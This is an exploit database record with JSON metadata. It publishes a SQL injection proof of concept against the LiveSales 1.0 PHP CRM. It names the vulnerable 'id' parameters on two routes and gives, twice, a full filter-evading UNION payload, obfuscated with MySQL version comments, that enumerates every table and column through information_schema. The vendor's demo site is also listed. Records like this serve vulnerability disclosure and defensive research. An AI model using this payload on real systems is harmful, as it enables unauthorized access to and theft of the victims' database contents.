ID 1337DAY-ID-28319
Type zdt
Reporter Ihsan Sencan
Modified 2017-08-19T00:00:00
Description
Exploit for php platform in category web applications
# # # # #
# Exploit Title: LiveSales 1.0 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://livecrm.co/
# Software Link: https://codecanyon.net/item/livesales-complete-sales-management-crm/20243171
# Demo: http://livesales.livecrm.co/livecrm/web/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows the users to inject sql commands ...
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?r=estimate/estimate/view&id=[SQL]
# 65+/*!11111UnioN*/(/*!11111sELECt*/+0x283129,0x283229,0x283329,0x283429,(select(@x)/*!22222from*/(/*!22222select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!22222select*/(0)/*!22222from*/(information_schema.columns)/*!22222where*/(table_schema=database())and(0x00)in(@x:=/*!22222CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!22222CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:[email protected]_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:[email protected]%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+-
#
# http://localhost/[PATH]/index.php?r=sales/lead/view&id=[SQL]
#
# Etc...
# # # # #
# 0day.today [2018-04-11] #
{"sourceData": "# # # # #\r\n# Exploit Title: LiveSales 1.0 - SQL Injection\r\n# Dork: N/A\r\n# Date: 18.08.2017\r\n# Vendor Homepage : http://livecrm.co/\r\n# Software Link: https://codecanyon.net/item/livesales-complete-sales-management-crm/20243171\r\n# Demo: http://livesales.livecrm.co/livecrm/web/\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows the users to inject sql commands ...\r\n# \r\n# Proof of Concept:\r\n# \r\n# http://localhost/[PATH]/index.php?r=estimate/estimate/view&id=[SQL]\r\n# 65+/*!11111UnioN*/(/*!11111sELECt*/+0x283129,0x283229,0x283329,0x283429,(select(@x)/*!22222from*/(/*!22222select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!22222select*/(0)/*!22222from*/(information_schema.columns)/*!22222where*/(table_schema=database())and(0x00)in(@x:=/*!22222CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!22222CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:[email\u00a0protected]_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:[email\u00a0protected]%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+-\r\n# \r\n# http://localhost/[PATH]/index.php?r=sales/lead/view&id=[SQL]\r\n# \r\n# Etc...\r\n# # # # #\n\n# 0day.today [2018-04-11] #", "history": [], "description": "Exploit for php platform in category web applications", "sourceHref": "https://0day.today/exploit/28319", "reporter": "Ihsan Sencan", "href": "https://0day.today/exploit/description/28319", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "3bc5d697f50317b958471e1fc5c4e675"}, {"key": "modified", "hash": "ee2480a334666bca9f16aaa4335ec370"}, {"key": "published", "hash": "ee2480a334666bca9f16aaa4335ec370"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8f9da6443571f75195f401f82e60b810"}, {"key": "sourceData", "hash": "3d18db15acb835c09dd3d54f82e48a3e"}, {"key": "sourceHref", "hash": "49ff9ac1046150b389851981428093e9"}, {"key": "title", "hash": "67b70e6cd182cb18634beb2a395817dc"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 3, "references": [], "lastseen": "2018-04-11T15:53:50", "published": "2017-08-19T00:00:00", "objectVersion": "1.3", "cvelist": [], "id": "1337DAY-ID-28319", "hash": "4e338b48eb50a141246c1e0b68732c68152bcbdf02075eba31b495340e407aeb", "modified": "2017-08-19T00:00:00", "title": "LiveSales 1.0 - SQL Injection Vulnerability", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-04-11T15:53:50"}, "dependencies": {"references": [], "modified": "2018-04-11T15:53:50"}, "vulnersScore": -0.1}}
{}